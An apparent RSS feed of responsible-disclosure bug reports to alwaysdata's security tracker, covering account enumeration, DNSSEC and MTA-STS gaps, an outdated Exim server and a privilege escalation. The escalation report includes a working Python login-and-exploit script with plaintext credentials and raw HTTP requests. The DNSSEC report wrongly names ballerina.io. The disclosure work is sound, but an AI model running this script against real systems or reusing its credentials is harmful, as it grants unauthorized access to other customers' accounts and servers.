Return the same generic response regardless of whether the email address exists. Use a consistent HTTP status code for both scenarios. Ensure response bodies, headers, and response timing are as similar as possible. A recommended response is:



“If an account exists for the provided email address, a password reset email will be sent.”



This approach prevents attackers from distinguishing between registered and unregistered email addresses.



ConclusionThe password reset functionality currently discloses account existence through differing responses. Standardizing the application’s responses for both valid and invalid email addresses will effectively prevent user enumeration and improve the overall security posture of the application.



I am submitting this report under responsible disclosure and would be happy to provide any additional information or assist with validation if required.



Kind regards,



Cyber_Subhash Security Researcher

</description>
    <content:encoded><![CDATA[
<p>
Dear Security Team,
</p>

<p>
I hope you are doing well.
</p>

<p>
I would like to responsibly disclose a security issue identified in the password reset functionality of your application. During testing, I observed that the application returns different responses for registered and non-registered email addresses, which allows an attacker to determine whether a specific email address is associated with a valid user account.
</p>

<p>
Severity:Medium
</p>

<p>
Category: Information Disclosure / User Enumeration
</p>

<p>
Description
</p>

<p>
The password reset endpoint responds differently based on whether the submitted email address exists in the system.
</p>

<p>
When a registered email address is entered, the application returns a successful password reset response. However, when an unregistered email address is submitted, the application returns a different error message indicating that the email address does not exist.
</p>

<p>
This behavior enables an attacker to enumerate valid user accounts by submitting multiple email addresses and comparing the application’s responses.
</p>

<p>
Steps to Reproduce
</p>

<p>
Navigate to the **Forgot Password page.<br />Enter a valid, registered email address.<br />Observe the success response indicating that a password reset email has been sent.<br />Repeat the process using an email address that is not registered.<br />Observe that the application returns a different response indicating that the email address does not exist.<br />Compare both responses and note that they reveal whether an email address is registered.<br />Proof of Concept
</p>

<p>
Registered Email
</p>

<p>
Email: registered@example.com
</p>

<p>
Response:<br />&quot;If an account exists, a password reset link has been sent.&quot;<br />Unregistered Email
</p>

<p>
Email: randomuser@example.com
</p>

<p>
Response:<br />&quot;Email address not found.&quot;<br />The difference in these responses allows an attacker to identify valid user accounts.
</p>

<p>
Security Impact
</p>

<p>
An attacker can exploit this behavior to:
</p>

<p>
Enumerate valid user accounts. Identify registered email addresses. Facilitate targeted phishing campaigns. Support credential stuffing or password spraying attacks. Gather intelligence for further attacks against identified users.
</p>

<p>
Although this issue does not directly expose user credentials, it increases the effectiveness of subsequent attacks by revealing valid account information.
</p>

<p>
Recommendation
</p>

<p>
To mitigate this issue:
</p>

<p>
Return the same generic response regardless of whether the email address exists. Use a consistent <acronym title="Hyper Text Transfer Protocol">HTTP</acronym> status code for both scenarios. Ensure response bodies, headers, and response timing are as similar as possible. A recommended response is:
</p>

<p>
“If an account exists for the provided email address, a password reset email will be sent.”
</p>

<p>
This approach prevents attackers from distinguishing between registered and unregistered email addresses.
</p>

<p>
Conclusion<br />The password reset functionality currently discloses account existence through differing responses. Standardizing the application’s responses for both valid and invalid email addresses will effectively prevent user enumeration and improve the overall security posture of the application.
</p>

<p>
I am submitting this report under responsible disclosure and would be happy to provide any additional information or assist with validation if required.
</p>

<p>
Kind regards,
</p>

<p>
Cyber_Subhash Security Researcher<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/359">
    <title>FS#359: DNSSEC Misconfiguration</title>
    <link>https://security.alwaysdata.com/task/359</link>
    <dc:date>2026-07-02T07:14:55Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Description: The DNSSEC (Domain Name System Security Extensions) configuration for the domain alwaysdata.com contains critical misconfigurations. DNSSEC is designed to safeguard DNS data from attacks such as cache poisoning and man-in-the-middle (MITM) by ensuring authentication and data integrity through digital signatures.



However, the current implementation for alwaysdata.com is incomplete and improperly configured, rendering DNSSEC ineffective and exposing the domain to potential exploitation.



Findings: Upon detailed analysis of the domain’s DNS records, the following issues were identified:



Unsigned DS Records: The Delegation Signer (DS) records in the parent zone are not correctly signed, breaking the essential chain of trust required for DNSSEC validation. Properly signed DS records are necessary to ensure the integrity of DNS queries.



Invalid RRSIG Records: Several Resource Record Signature (RRSIG) entries in the DNS zone are invalid, indicating key management or signing process failures. These invalid signatures compromise the authenticity and integrity guarantees provided by DNSSEC.



DNSKEY Mismatch: A mismatch exists between the DNSKEY records in the domain’s DNSKEY RRset and those provided in the delegation response from the parent zone. This inconsistency weakens the DNSSEC chain of trust, making the domain susceptible to tampering.



Steps to Reproduce:



Navigate to the DNSSEC debugging tool: https://dnssec-debugger.verisignlabs.com



Enter the domain alwaysdata.com for analysis.



Observe the red-highlighted errors indicating DNSSEC misconfigurations and missing or invalid DNSSEC records.



Impact: Due to these misconfigurations, the domain ballerina.io is vulnerable to several security risks, including:



DNS Cache Poisoning: Attackers can inject forged DNS responses, redirecting users to malicious sites.



Man-in-the-Middle Attacks: Without valid DNSSEC validation, attackers can intercept and alter DNS responses.



Domain Impersonation: Weak or broken DNSSEC allows attackers to impersonate legitimate services under the domain.



Data Tampering: DNS records could be modified, leading to data leaks or loss of service integrity.



Reputation Damage: A compromised DNS configuration undermines user trust and damages the organization’s credibility.

</description>
    <content:encoded><![CDATA[
<p>
Description: The DNSSEC (Domain Name System Security Extensions) configuration for the domain alwaysdata.com contains critical misconfigurations. DNSSEC is designed to safeguard <acronym title="Domain Name Server">DNS</acronym> data from attacks such as cache poisoning and man-in-the-middle (MITM) by ensuring authentication and data integrity through digital signatures.
</p>

<p>
However, the current implementation for alwaysdata.com is incomplete and improperly configured, rendering DNSSEC ineffective and exposing the domain to potential exploitation.
</p>

<p>
Findings: Upon detailed analysis of the domain’s <acronym title="Domain Name Server">DNS</acronym> records, the following issues were identified:
</p>

<p>
Unsigned DS Records: The Delegation Signer (DS) records in the parent zone are not correctly signed, breaking the essential chain of trust required for DNSSEC validation. Properly signed DS records are necessary to ensure the integrity of <acronym title="Domain Name Server">DNS</acronym> queries.
</p>

<p>
Invalid RRSIG Records: Several Resource Record Signature (RRSIG) entries in the <acronym title="Domain Name Server">DNS</acronym> zone are invalid, indicating key management or signing process failures. These invalid signatures compromise the authenticity and integrity guarantees provided by DNSSEC.
</p>

<p>
DNSKEY Mismatch: A mismatch exists between the DNSKEY records in the domain’s DNSKEY RRset and those provided in the delegation response from the parent zone. This inconsistency weakens the DNSSEC chain of trust, making the domain susceptible to tampering.
</p>

<p>
Steps to Reproduce:
</p>

<p>
Navigate to the DNSSEC debugging tool: <a href="https://dnssec-debugger.verisignlabs.com" class="urlextern" title="https://dnssec-debugger.verisignlabs.com"  rel="nofollow">https://dnssec-debugger.verisignlabs.com</a>
</p>

<p>
Enter the domain alwaysdata.com for analysis.
</p>

<p>
Observe the red-highlighted errors indicating DNSSEC misconfigurations and missing or invalid DNSSEC records.
</p>

<p>
Impact: Due to these misconfigurations, the domain ballerina.io is vulnerable to several security risks, including:
</p>

<p>
<acronym title="Domain Name Server">DNS</acronym> Cache Poisoning: Attackers can inject forged <acronym title="Domain Name Server">DNS</acronym> responses, redirecting users to malicious sites.
</p>

<p>
Man-in-the-Middle Attacks: Without valid DNSSEC validation, attackers can intercept and alter <acronym title="Domain Name Server">DNS</acronym> responses.
</p>

<p>
Domain Impersonation: Weak or broken DNSSEC allows attackers to impersonate legitimate services under the domain.
</p>

<p>
Data Tampering: <acronym title="Domain Name Server">DNS</acronym> records could be modified, leading to data leaks or loss of service integrity.
</p>

<p>
Reputation Damage: A compromised <acronym title="Domain Name Server">DNS</acronym> configuration undermines user trust and damages the organization’s credibility.<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/358">
    <title>FS#358: Inadequate Concurrent Sessions</title>
    <link>https://security.alwaysdata.com/task/358</link>
    <dc:date>2026-07-02T07:12:40Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Description:



The application https://admin.alwaysdata.com/login/ does not validate the number of active sessions per user, allowing multiple concurrent logins without any limitations. Additionally, the application fails to notify users when a new session is initiated from a different location or device. This issue poses significant security risks, especially in areas handling sensitive data, such as admin panels or personal user accounts.



Steps to Reproduce:



Login from Device A :



Navigate to https://admin.alwaysdata.com/login/ Enter valid credentials and log in.Login from Device B :



Using a different device or browser (e.g., mobile phone or another computer), navigate to https://admin.alwaysdata.com/login/ Log in with the same user credentials used in Step 1.Verify Active Sessions:



Observe that both sessions remain active simultaneously.Note that the application does not notify the user about the new session from a different location/device.Actual Behavior:



The application allows multiple concurrent sessions for a single user account without any limitations.No notifications are sent to the user when a new session is initiated from a different location or device.There is no mechanism to monitor or manage active sessions within the user account.Expected Behavior:



The application should limit the number of active sessions per user to enhance security.Users should receive notifications when a new session is initiated from a different location or device.A session management page should be provided, allowing users to view and terminate active sessions.Impact:



Non-Repudiation Risks : The lack of session notifications and limitations can lead to unauthorized access and actions that are difficult to dispute.Increased Vulnerability : Multiple concurrent sessions increase the risk of unauthorized access, especially if one of the sessions is compromised.Remediation:



User Notification : Notify users when a new session is initiated, especially from a different location or device, to raise awareness of active sessions.



Session Management Page : Provide users with a dedicated session management page to view and terminate active sessions for enhanced control.



IP Address Tracking and Restrictions :



Track the IP addresses associated with each session and flag any suspicious activity, such as multiple logins from different locations.Allow users to specify trusted IP addresses or ranges, restricting session initiation to known and approved locations.

</description>
    <content:encoded><![CDATA[
<p>
Description:
</p>

<p>
The application <a href="https://admin.alwaysdata.com/login/" class="urlextern" title="https://admin.alwaysdata.com/login/"  rel="nofollow">https://admin.alwaysdata.com/login/</a> does not validate the number of active sessions per user, allowing multiple concurrent logins without any limitations. Additionally, the application fails to notify users when a new session is initiated from a different location or device. This issue poses significant security risks, especially in areas handling sensitive data, such as admin panels or personal user accounts.
</p>

<p>
Steps to Reproduce:
</p>

<p>
Login from Device A :
</p>

<p>
Navigate to <a href="https://admin.alwaysdata.com/login/" class="urlextern" title="https://admin.alwaysdata.com/login/"  rel="nofollow">https://admin.alwaysdata.com/login/</a> Enter valid credentials and log in.<br />Login from Device B :
</p>

<p>
Using a different device or browser (e.g., mobile phone or another computer), navigate to <a href="https://admin.alwaysdata.com/login/" class="urlextern" title="https://admin.alwaysdata.com/login/"  rel="nofollow">https://admin.alwaysdata.com/login/</a> Log in with the same user credentials used in Step 1.<br />Verify Active Sessions:
</p>

<p>
Observe that both sessions remain active simultaneously.<br />Note that the application does not notify the user about the new session from a different location/device.<br />Actual Behavior:
</p>

<p>
The application allows multiple concurrent sessions for a single user account without any limitations.<br />No notifications are sent to the user when a new session is initiated from a different location or device.<br />There is no mechanism to monitor or manage active sessions within the user account.<br />Expected Behavior:
</p>

<p>
The application should limit the number of active sessions per user to enhance security.<br />Users should receive notifications when a new session is initiated from a different location or device.<br />A session management page should be provided, allowing users to view and terminate active sessions.<br />Impact:
</p>

<p>
Non-Repudiation Risks : The lack of session notifications and limitations can lead to unauthorized access and actions that are difficult to dispute.<br />Increased Vulnerability : Multiple concurrent sessions increase the risk of unauthorized access, especially if one of the sessions is compromised.<br />Remediation:
</p>

<p>
User Notification : Notify users when a new session is initiated, especially from a different location or device, to raise awareness of active sessions.
</p>

<p>
Session Management Page : Provide users with a dedicated session management page to view and terminate active sessions for enhanced control.
</p>

<p>
IP Address Tracking and Restrictions :
</p>

<p>
Track the IP addresses associated with each session and flag any suspicious activity, such as multiple logins from different locations.<br />Allow users to specify trusted IP addresses or ranges, restricting session initiation to known and approved locations.<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/357">
    <title>FS#357: Bug Bounty Report : MTA-STS Missing</title>
    <link>https://security.alwaysdata.com/task/357</link>
    <dc:date>2026-07-02T07:49:51Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Bug Description: Upon examining the DNS (Domain Name System) records for the domain alwaysdata.com , it has come to my attention that the MTA-STS record is missing . The MTA-STS mechanism is designed to enforce secure email communication by requiring the use of TLS (Transport Layer Security) encryption. However, in this case, the absence of the MTA-STS record exposes the email infrastructure to potential security vulnerabilities.



Expected Behavior: The MTA-STS record should be correctly configured and published in the DNS records for the domain [Domain Name]. It is essential for secure email communication and enforcing TLS encryption for all incoming and outgoing email traffic.



Steps to Reproduce:



Navigate this url https://easydmarc.com/tools/mta-sts-check and enter your domain name alwaysdata.com



Observe the absence of the MTA-STS record in the DNS response. No record was found, indicating that the MTA-STS record is not present in the DNS configuration.



Impact: The absence of an MTA-STS record leaves the email infrastructure vulnerable to various security risks, such as downgrade attacks, man-in-the-middle attacks, and interception of sensitive email content. Without the MTA-STS mechanism in place, email communications may be transmitted over unencrypted channels, compromising the confidentiality and integrity of the data.

</description>
    <content:encoded><![CDATA[
<p>
Bug Description: Upon examining the <acronym title="Domain Name Server">DNS</acronym> (Domain Name System) records for the domain alwaysdata.com , it has come to my attention that the MTA-STS record is missing . The MTA-STS mechanism is designed to enforce secure email communication by requiring the use of <acronym title="Transport Layer Security">TLS</acronym> (Transport Layer Security) encryption. However, in this case, the absence of the MTA-STS record exposes the email infrastructure to potential security vulnerabilities.
</p>

<p>
Expected Behavior: The MTA-STS record should be correctly configured and published in the <acronym title="Domain Name Server">DNS</acronym> records for the domain [Domain Name]. It is essential for secure email communication and enforcing <acronym title="Transport Layer Security">TLS</acronym> encryption for all incoming and outgoing email traffic.
</p>

<p>
Steps to Reproduce:
</p>

<p>
Navigate this url <a href="https://easydmarc.com/tools/mta-sts-check" class="urlextern" title="https://easydmarc.com/tools/mta-sts-check"  rel="nofollow">https://easydmarc.com/tools/mta-sts-check</a> and enter your domain name alwaysdata.com
</p>

<p>
Observe the absence of the MTA-STS record in the <acronym title="Domain Name Server">DNS</acronym> response. No record was found, indicating that the MTA-STS record is not present in the <acronym title="Domain Name Server">DNS</acronym> configuration.
</p>

<p>
Impact: The absence of an MTA-STS record leaves the email infrastructure vulnerable to various security risks, such as downgrade attacks, man-in-the-middle attacks, and interception of sensitive email content. Without the MTA-STS mechanism in place, email communications may be transmitted over unencrypted channels, compromising the confidentiality and integrity of the data.<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/356">
    <title>FS#356: 	Outdated Exim SMTP Server (Version 4.96) Potentially Affected by Multiple Publicly Disclosed CVEs</title>
    <link>https://security.alwaysdata.com/task/356</link>
    <dc:date>2026-07-02T07:10:40Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Dear Alwaysdata Security Team, I hope you are doing well. I am writing to responsibly disclose a security observation identified during an assessment of your publicly accessible SMTP infrastructure. Summary During testing, multiple public-facing SMTP servers were identified exposing an Exim 4.96 SMTP banner. Based on the detected version and publicly available Exim security advisories, the affected systems may be impacted by multiple known vulnerabilities ranging from Remote Code Execution (RCE) and Privilege Escalation to Information Disclosure, SMTP Smuggling, and Denial of Service (DoS). Affected Assets IP Address Hostname Service 185.31.40.80 smtpin1.paris1.alwaysdata.com SMTP (Exim 4.96) 78.142.219.80 smtpin1.paris2.alwaysdata.com SMTP (Exim 4.96) 78.142.219.5 overlord-core.paris2.alwaysdata.com TLS Service Evidence Asset 1 IP Address: 185.31.40.80 Hostname: smtpin1.paris1.alwaysdata.com SMTP Banner 220 smtpin1.paris1.alwaysdata.com ESMTP Exim 4.96 Supported Features • STARTTLS • PIPELINING • PIPECONNECT • SMTPUTF8 • 8BITMIME Asset 2 IP Address: 78.142.219.80 Hostname: smtpin1.paris2.alwaysdata.com SMTP Banner 220 smtpin1.paris2.alwaysdata.com ESMTP Exim 4.96 Supported Features • STARTTLS • PIPELINING • PIPECONNECT • SMTPUTF8 • 8BITMIME



Asset 3 IP Address: 78.142.219.5 Hostname: overlord-core.paris2.alwaysdata.com Supported TLS Versions • TLS 1.2 • TLS 1.3 Technical Description The SMTP servers publicly disclose Exim version 4.96 through the SMTP banner. According to publicly available Exim security advisories, this version predates several security fixes released during 2023–2026. Depending on the exact build, enabled modules, and runtime configuration, the deployment may be affected by multiple security vulnerabilities. These issues include unsafe memory handling, improper input validation, authentication-related flaws, MIME parsing issues, SMTP protocol parsing weaknesses, JSON parsing bugs, UTF-8 processing vulnerabilities, and DNS handling issues. Collectively, these weaknesses increase the attack surface of the mail infrastructure and may allow attackers to compromise confidentiality, integrity, or availability under specific conditions. Potentially Applicable CVEs Critical Remote Code Execution • CVE-2023-42115 • CVE-2023-42116 • CVE-2023-42117 These vulnerabilities involve memory corruption and insufficient validation of SMTP data, potentially allowing unauthenticated remote attackers to execute arbitrary code under vulnerable configurations. Privilege Escalation • CVE-2025-30232 A use-after-free vulnerability that may allow local privilege escalation under affected deployments. Information Disclosure • CVE-2026-48840 • CVE-2026-40687 • CVE-2026-40686 • CVE-2023-42119 • CVE-2023-42114 These vulnerabilities may expose process memory, heap contents, or sensitive information through malformed protocol interactions. Memory Corruption • CVE-2026-40685 • CVE-2025-67896 These issues involve heap corruption or out-of-bounds memory operations that may lead to crashes or code execution depending on the deployment. SMTP Security Issues • CVE-2023-51766 (SMTP Smuggling) • CVE-2024-39929 (RFC2231 MIME Parsing) These vulnerabilities may enable email spoofing, bypass of SPF-related protections, or delivery of blocked attachments under specific mail flow configurations. Denial of Service • CVE-2026-40684 • CVE-2022-3620 • CVE-2022-3559 These vulnerabilities may allow attackers to trigger service crashes or otherwise reduce SMTP service availability. Security Impact If the affected version is confirmed and the vulnerable functionality is enabled, successful exploitation could potentially result in: • Remote Code Execution (RCE) • SMTP Server Compromise • Privilege Escalation • Information Disclosure • Heap or Stack Memory Corruption • SMTP Smuggling • Email Spoofing • SPF Protection Bypass • Delivery of Malicious Attachments • Denial of Service (DoS) The actual impact depends on the deployed Exim configuration and whether the relevant vulnerable components are enabled. Recommendation I recommend the following remediation steps:



Upgrade Exim to the latest supported stable release.Apply all vendor security patches.Verify that the SMTP servers are no longer exposing outdated Exim versions.Review enabled authentication mechanisms and optional Exim modules.Validate that all publicly disclosed Exim vulnerabilities affecting the deployed version have been remediated.Perform a post-upgrade security verification to ensure the service is no longer affected. Conclusion The observed SMTP infrastructure publicly identifies itself as running Exim 4.96, a version associated with multiple publicly disclosed security vulnerabilities. While additional validation is required to determine which vulnerabilities are exploitable in your specific environment, upgrading to the latest supported release is strongly recommended to reduce the attack surface and maintain a secure mail infrastructure. This report is submitted in the spirit of responsible disclosure. I would be happy to provide any additional information if required. Kind regards, Cyber_Subhash Security Researcher

</description>
    <content:encoded><![CDATA[
<p>
Dear Alwaysdata Security Team, I hope you are doing well. I am writing to responsibly disclose a security observation identified during an assessment of your publicly accessible <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> infrastructure. Summary During testing, multiple public-facing <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> servers were identified exposing an Exim 4.96 <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> banner. Based on the detected version and publicly available Exim security advisories, the affected systems may be impacted by multiple known vulnerabilities ranging from Remote Code Execution (RCE) and Privilege Escalation to Information Disclosure, <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Smuggling, and Denial of Service (DoS). Affected Assets IP Address Hostname Service 185.31.40.80 smtpin1.paris1.alwaysdata.com <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> (Exim 4.96) 78.142.219.80 smtpin1.paris2.alwaysdata.com <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> (Exim 4.96) 78.142.219.5 overlord-core.paris2.alwaysdata.com <acronym title="Transport Layer Security">TLS</acronym> Service Evidence Asset 1 IP Address: 185.31.40.80 Hostname: smtpin1.paris1.alwaysdata.com <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Banner 220 smtpin1.paris1.alwaysdata.com <acronym title="Extended Simple Mail Transfer Protocol">ESMTP</acronym> Exim 4.96 Supported Features • STARTTLS • PIPELINING • PIPECONNECT • SMTPUTF8 • 8BITMIME Asset 2 IP Address: 78.142.219.80 Hostname: smtpin1.paris2.alwaysdata.com <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Banner 220 smtpin1.paris2.alwaysdata.com <acronym title="Extended Simple Mail Transfer Protocol">ESMTP</acronym> Exim 4.96 Supported Features • STARTTLS • PIPELINING • PIPECONNECT • SMTPUTF8 • 8BITMIME
</p>

<p>
Asset 3 IP Address: 78.142.219.5 Hostname: overlord-core.paris2.alwaysdata.com Supported <acronym title="Transport Layer Security">TLS</acronym> Versions • <acronym title="Transport Layer Security">TLS</acronym> 1.2 • <acronym title="Transport Layer Security">TLS</acronym> 1.3 Technical Description The <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> servers publicly disclose Exim version 4.96 through the <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> banner. According to publicly available Exim security advisories, this version predates several security fixes released during 2023–2026. Depending on the exact build, enabled modules, and runtime configuration, the deployment may be affected by multiple security vulnerabilities. These issues include unsafe memory handling, improper input validation, authentication-related flaws, <acronym title="Multipurpose Internet Mail Extension">MIME</acronym> parsing issues, <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> protocol parsing weaknesses, JSON parsing bugs, UTF-8 processing vulnerabilities, and <acronym title="Domain Name Server">DNS</acronym> handling issues. Collectively, these weaknesses increase the attack surface of the mail infrastructure and may allow attackers to compromise confidentiality, integrity, or availability under specific conditions. Potentially Applicable CVEs Critical Remote Code Execution • CVE-2023-42115 • CVE-2023-42116 • CVE-2023-42117 These vulnerabilities involve memory corruption and insufficient validation of <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> data, potentially allowing unauthenticated remote attackers to execute arbitrary code under vulnerable configurations. Privilege Escalation • CVE-2025-30232 A use-after-free vulnerability that may allow local privilege escalation under affected deployments. Information Disclosure • CVE-2026-48840 • CVE-2026-40687 • CVE-2026-40686 • CVE-2023-42119 • CVE-2023-42114 These vulnerabilities may expose process memory, heap contents, or sensitive information through malformed protocol interactions. Memory Corruption • CVE-2026-40685 • CVE-2025-67896 These issues involve heap corruption or out-of-bounds memory operations that may lead to crashes or code execution depending on the deployment. <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Security Issues • CVE-2023-51766 (<acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Smuggling) • CVE-2024-39929 (RFC2231 <acronym title="Multipurpose Internet Mail Extension">MIME</acronym> Parsing) These vulnerabilities may enable email spoofing, bypass of SPF-related protections, or delivery of blocked attachments under specific mail flow configurations. Denial of Service • CVE-2026-40684 • CVE-2022-3620 • CVE-2022-3559 These vulnerabilities may allow attackers to trigger service crashes or otherwise reduce <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> service availability. Security Impact If the affected version is confirmed and the vulnerable functionality is enabled, successful exploitation could potentially result in: • Remote Code Execution (RCE) • <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Server Compromise • Privilege Escalation • Information Disclosure • Heap or Stack Memory Corruption • <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> Smuggling • Email Spoofing • SPF Protection Bypass • Delivery of Malicious Attachments • Denial of Service (DoS) The actual impact depends on the deployed Exim configuration and whether the relevant vulnerable components are enabled. Recommendation I recommend the following remediation steps:
</p>

<p>
Upgrade Exim to the latest supported stable release.<br />Apply all vendor security patches.<br />Verify that the <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> servers are no longer exposing outdated Exim versions.<br />Review enabled authentication mechanisms and optional Exim modules.<br />Validate that all publicly disclosed Exim vulnerabilities affecting the deployed version have been remediated.<br />Perform a post-upgrade security verification to ensure the service is no longer affected. Conclusion The observed <acronym title="Simple Mail Transfer Protocol">SMTP</acronym> infrastructure publicly identifies itself as running Exim 4.96, a version associated with multiple publicly disclosed security vulnerabilities. While additional validation is required to determine which vulnerabilities are exploitable in your specific environment, upgrading to the latest supported release is strongly recommended to reduce the attack surface and maintain a secure mail infrastructure. This report is submitted in the spirit of responsible disclosure. I would be happy to provide any additional information if required. Kind regards, Cyber_Subhash Security Researcher<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/349">
    <title>FS#349: Reseller-Level Permission Flags Accessible to Regular Customer Accounts</title>
    <link>https://security.alwaysdata.com/task/349</link>
    <dc:date>2026-06-25T05:34:19Z</dc:date>
    <dc:creator>Nayan Acharya</dc:creator>
     <description>

# Finding: Reseller-Level Permission Flags Accessible to Regular Customer Accounts



—



## Submission Details 


	
		 Field  Value 
	
	
		——-——-
	
	
		 Title  Reseller-Level Permission Flags Accessible to Regular Customer Accounts 
	
	
		 Severity  High 
	
	
		 CVSS Score  8.0 
	
	
		 CVSS Vector  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 
	
	
		 CWE  CWE-269 - Improper Privilege Management 
	
	
		 Endpoint  `POST https://admin.alwaysdata.com/permissions/add/` 
	
	
		 Affected Fields  `customer_full_accounts`, `customer_full_servers` 
	
	
		 Date Discovered  2026-06-24 
	
	
		 Status  ✅ Confirmed 
	



 —



## 1. Description



alwaysdata&amp;#039;s permission system allows account owners to delegate access to other users. The permissions creation form at `/permissions/add/` exposes reseller-level flags to all customers, including regular (non-reseller) accounts.



Reseller flags identified: - `customer_full_accounts` - grants access to manage all customer accounts on the platform- `customer_full_servers` - grants access to manage all server configurations on the platform



The vulnerability: The server accepts these flags from any account, regardless of whether the submitting account has reseller privileges. A regular customer can create a permission record with these flags active (HTTP 302), and the flags are saved as &amp;quot;checked&amp;quot; (active) in the permission details.



—



## 2. Test Environment 


	
		 Item  Value 
	
	
		————-
	
	
		 Test Account  cyberzod (ID 482835) 
	
	
		 Account Type  Regular Customer (NOT reseller) 
	
	
		 Testing Method  Manual HTTP requests via Python 
	



 —



## 3. Steps to Reproduce



### Step 1: Verify Account is Regular Customer



# Check account type in profile
GET https://admin.alwaysdata.com/profile/



Result: Account confirmed as regular customer (no reseller privileges).



### Step 2: Access Permissions Add Page

GET https://admin.alwaysdata.com/permissions/add/


 Result: Page loads with permission checkboxes.



### Step 3: Locate Reseller Flags



The page contains reseller-level checkboxes:- `customer_full_accounts`- `customer_full_servers`



### Step 4: Submit Reseller Flags



Request: 


POST /permissions/add/ HTTP/2
Host: admin.alwaysdata.com
Content-Type: application/x-www-form-urlencoded
Cookie: sessionid=...

csrfmiddlewaretoken=...&amp;amp;
customer_full_accounts=on&amp;amp;
customer_full_servers=on&amp;amp;
email=test_1782361132@example.com



Response: 


HTTP/2 302 Found
Location: /permissions/
Set-Cookie: messages=...Successfully created...



### Step 5: Verify Permission Created

GET https://admin.alwaysdata.com/permissions/469280/



Response:

Permission 469280 details:
- customer_full_accounts: checked (active)
- customer_full_servers: checked (active)
- Grantee: test_1782361132@example.com



—



## 4. Proof of Concept



### Python PoC Script


import requests
import re
import time

EMAIL = &amp;quot;michenhenryyissuehunt@gmail.com&amp;quot;
PASSWORD = &amp;quot;Cyberzod@123&amp;quot;

s = requests.Session()
s.headers.update({
    &amp;#039;User-Agent&amp;#039;: &amp;#039;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36&amp;#039;
})

# Login
login_page = s.get(&amp;quot;https://admin.alwaysdata.com/login/&amp;quot;)
csrf_login = login_page.text.split(&amp;#039;csrfmiddlewaretoken&amp;quot; value=&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0]

s.post(
    &amp;quot;https://admin.alwaysdata.com/login/&amp;quot;,
    data={
        &amp;quot;csrfmiddlewaretoken&amp;quot;: csrf_login,
        &amp;quot;login&amp;quot;: EMAIL,
        &amp;quot;password&amp;quot;: PASSWORD,
        &amp;quot;alive&amp;quot;: &amp;quot;on&amp;quot;
    }
)

# Get permissions page
add_page = s.get(&amp;quot;https://admin.alwaysdata.com/permissions/add/&amp;quot;)
csrf = add_page.text.split(&amp;#039;csrfmiddlewaretoken&amp;quot; value=&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0]

# Create permission with reseller flags
test_email = f&amp;quot;test_{int(time.time())}@example.com&amp;quot;

r = s.post(
    &amp;quot;https://admin.alwaysdata.com/permissions/add/&amp;quot;,
    data={
        &amp;quot;csrfmiddlewaretoken&amp;quot;: csrf,
        &amp;quot;customer_full_accounts&amp;quot;: &amp;quot;on&amp;quot;,
        &amp;quot;customer_full_servers&amp;quot;: &amp;quot;on&amp;quot;,
        &amp;quot;email&amp;quot;: test_email,
    },
    allow_redirects=False
)

print(f&amp;quot;Status: {r.status_code}&amp;quot;)  # 302

# Verify permission was created
permissions_page = s.get(&amp;quot;https://admin.alwaysdata.com/permissions/&amp;quot;)
perm_ids = re.findall(r&amp;#039;/permissions?/(\d+)/&amp;#039;, permissions_page.text)
perm_id = max(perm_ids, key=lambda x: int(x))

detail_page = s.get(f&amp;quot;https://admin.alwaysdata.com/permissions/{perm_id}/&amp;quot;)

has_cfa = &amp;#039;customer_full_accounts&amp;#039; in detail_page.text and &amp;#039;checked&amp;#039; in detail_page.text
has_cfs = &amp;#039;customer_full_servers&amp;#039; in detail_page.text and &amp;#039;checked&amp;#039; in detail_page.text

print(f&amp;quot;customer_full_accounts active: {has_cfa}&amp;quot;)  # True
print(f&amp;quot;customer_full_servers active: {has_cfs}&amp;quot;)   # True



### PoC Output

Status: 302
customer_full_accounts active: True
customer_full_servers active: True



—



## 5. Evidence Summary 


	
		 Evidence  Status 
	
	
		———-——–
	
	
		 Account is regular customer (not reseller)  ✅ Confirmed 
	
	
		 Reseller flags exist on permissions page  ✅ Confirmed 
	
	
		 Regular account can submit reseller flags  ✅ Confirmed 
	
	
		 Server accepts submission (HTTP 302)  ✅ Confirmed 
	
	
		 Permission record created with reseller flags  ✅ Confirmed 
	
	
		 Flags saved as &amp;quot;checked&amp;quot; (active)  ✅ Confirmed 
	
	
		 Permission ID: 469280  ✅ Confirmed 
	



 —



## 6. Impact



### Immediate Impact 


	
		 Impact  Description 
	
	
		——–————-
	
	
		 Privilege Escalation  Regular customers can grant themselves or others reseller access 
	
	
		 Cross-Account Access  Reseller permissions grant access to ALL customer accounts 
	
	
		 Server Control  Reseller permissions grant access to ALL server configurations 
	
	
		 Data Exposure  Reseller permissions grant access to ALL customer data 
	



 ### Attack Chain



